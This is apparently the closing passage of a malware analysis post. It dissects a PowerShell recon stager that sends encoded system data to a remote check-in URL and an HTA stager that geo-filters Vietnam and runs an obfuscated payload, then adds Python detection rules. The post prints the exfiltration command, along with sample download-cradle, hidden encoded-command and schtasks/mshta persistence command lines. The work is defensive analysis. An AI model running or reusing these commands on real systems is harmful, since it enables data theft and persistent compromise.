4. Preparing and Sending the Data:
$Uy2NFs = "88145175bb9ef088c61f5ab089701dd7";
$p0stP4r4m = @{pass=$Uy2NFs;data=$EncYer}
iwr -Uri http://megacybernews.com/checkin.php -Method POST -Body $p0stP4r4m
- $Uy2NFs = "88145175bb9ef088c61f5ab089701dd7";: This variable appears to be a static passphrase or identifier.
- $p0stP4r4m = @{pass=$Uy2NFs;data=$EncYer}: Creates a hashtable (key-value pairs) that contains the passphrase and the encoded data.
- iwr -Uri http://megacybernews.com/checkin.php -Method POST -Body $p0stP4r4m: iwr (Invoke-WebRequest) sends an HTTP request to the specified URL. -Uri http://megacybernews.com/checkin.php is the URL the data is sent to, -Method POST specifies that the request should use the POST method, and -Body $p0stP4r4m sends the $p0stP4r4m hashtable as the body of the POST request, which includes the passphrase and the Base64-encoded system information.
Summary:
This script is likely part of a reconnaissance phase in preparation for a cyber attack. It collects a variety of system and network information, encodes it into a Base64 string, and sends it to a remote server via an HTTP POST request.
Key Takeaways:
- The script gathers detailed information about the system, network, processes, and users.
- The information is then encoded and sent to an external server, potentially for further analysis or to aid in an attack.
- This type of script is commonly used in malicious activities to gather intelligence on the target system before launching further attacks.
Stager2 Summary:
This HTA script performs the following actions:
- Geo-filtering: It checks the user's location by querying ipinfo.io for the country code. If the country is not Vietnam (VN), the script terminates.
- Decryption and Execution: The script contains an obfuscated or encrypted payload, which it decrypts and executes using the Windows Script Host (WScript.Shell). The exact nature of the payload is hidden by the encoding, but it could potentially be malicious.
Security Implications:
This script is potentially dangerous, as it:
- Executes hidden commands on the system.
- Includes obfuscated content, which is a common tactic in malware to evade detection.
- Uses geo-targeting, which is often seen in targeted attacks where the attacker wants to avoid detection in specific regions.
If encountered in the wild, this script should be treated as suspicious and analyzed in a controlled environment.
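As an added example that is not part of the original post, the following Python turns the behaviours analysed above (forfiles proxying PowerShell, a hidden encoded command, an IEX/IWR download cradle, schtasks persistence pointing at mshta, mshta running an .hta from a user path, and the mixed-case execution-policy bypass) into case-insensitive triage rules run over constructed process-creation records; the URLs, victim path and events are placeholders modelled on the chain, not captured telemetry.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / 4688 style), constructed."""
    parent: str   # parent image path
    image: str    # image path of the new process
    cmdline: str  # full command line


def _ci(pattern: str) -> re.Pattern:
    # Case-insensitive on purpose: stager2 spells it "powersHElL -execUTIon BYpASS".
    return re.compile(pattern, re.IGNORECASE)


_HIDDEN = _ci(r"\s-w(?:in(?:dowstyle)?)?\s+hidden")
_ENCODED = _ci(r"\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}")
_IEX = _ci(r"\biex\b")
_IWR = _ci(r"\b(?:iwr|invoke-webrequest)\b")
_EP_BYPASS = _ci(r"-e(?:p|x\w*)\s+bypass")
_SCHTASKS_MSHTA = _ci(r"/create\b.*?/tr\s+\"?mshta")
_HTA_USER_PATH = _ci(r"(?:\\temp\\|\\appdata\\|\\users\\)[^\s\"]*\.hta")

# (tag, predicate). Each rule maps to one step of the chain described in this post.
RULES = [
    ("forfiles_proxy_exec",          # forfiles.exe /c used to launch PowerShell
     lambda e: e.parent.lower().endswith("forfiles.exe") and "powershell" in e.cmdline.lower()),
    ("ps_hidden_window",             # -w hidden
     lambda e: bool(_HIDDEN.search(e.cmdline))),
    ("ps_encoded_command",           # -e <long base64>
     lambda e: bool(_ENCODED.search(e.cmdline))),
    ("ps_download_cradle",           # iex (iwr ...)
     lambda e: bool(_IEX.search(e.cmdline)) and bool(_IWR.search(e.cmdline))),
    ("ps_policy_bypass_b64",         # -execution bypass ... FromBase64String
     lambda e: bool(_EP_BYPASS.search(e.cmdline)) and "frombase64string" in e.cmdline.lower()),
    ("schtasks_mshta_persistence",   # schtasks /create ... /tr "mshta ..."
     lambda e: e.image.lower().endswith("schtasks.exe") and bool(_SCHTASKS_MSHTA.search(e.cmdline))),
    ("mshta_hta_from_user_path",     # mshta running an .hta out of %TEMP% / a user profile
     lambda e: e.image.lower().endswith("mshta.exe") and bool(_HTA_USER_PATH.search(e.cmdline))),
]


def classify(event: ProcEvent) -> list:
    """Return the tags of every rule the event trips, in RULES order."""
    return [tag for tag, hit in RULES if hit(event)]


def triage(events: list) -> dict:
    """Map each suspicious command line to its tags; events that trip nothing are dropped."""
    return {e.cmdline: classify(e) for e in events if classify(e)}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events modelled on the chain in this post. URLs and the victim path
# are placeholders; the encoded blob is only the first 64 chars of stager1's.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\forfiles.exe", PS,
              "powershell -c iex (iwr https://example.invalid/stager1);"
              "iwr https://example.invalid/stager2 -o C:\\Users\\victim\\Documents\\update.hta"),
    ProcEvent(PS, PS,
              "powershell -w hidden -e MQAuAC4ANgAwACAAfAAgACUAIAB7AHMAbABlAGUAcAAgADEAfQA7ACQAcwAxAD0A"),
    ProcEvent(PS, r"C:\Windows\System32\schtasks.exe",
              'schtasks /create /Sc minute /f /Tn MicrosoftEdgeUpdate /mo 30 '
              '/tr "mshta C:\\Users\\victim\\AppData\\Local\\Temp\\update.hta"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta C:\Users\victim\AppData\Local\Temp\update.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", PS,
              "powersHElL -noPrOfil -execUTIon BYpASS -comMaNd iex([System.Text.Encoding]"
              "::UTF8.GetString([System.Convert]::FromBase64String('QQ==')))"),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell -NoProfile -Command Get-Process"),   # benign control
]

if __name__ == "__main__":
    for cmd, tags in triage(SAMPLE_EVENTS).items():
        print(tags, cmd[:60])
```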
MITRE ATT&CK® Techniques
Indicators of Compromise
Resources
Hackers are already taking advantage of the CrowdStrike outage chaos | CNN Business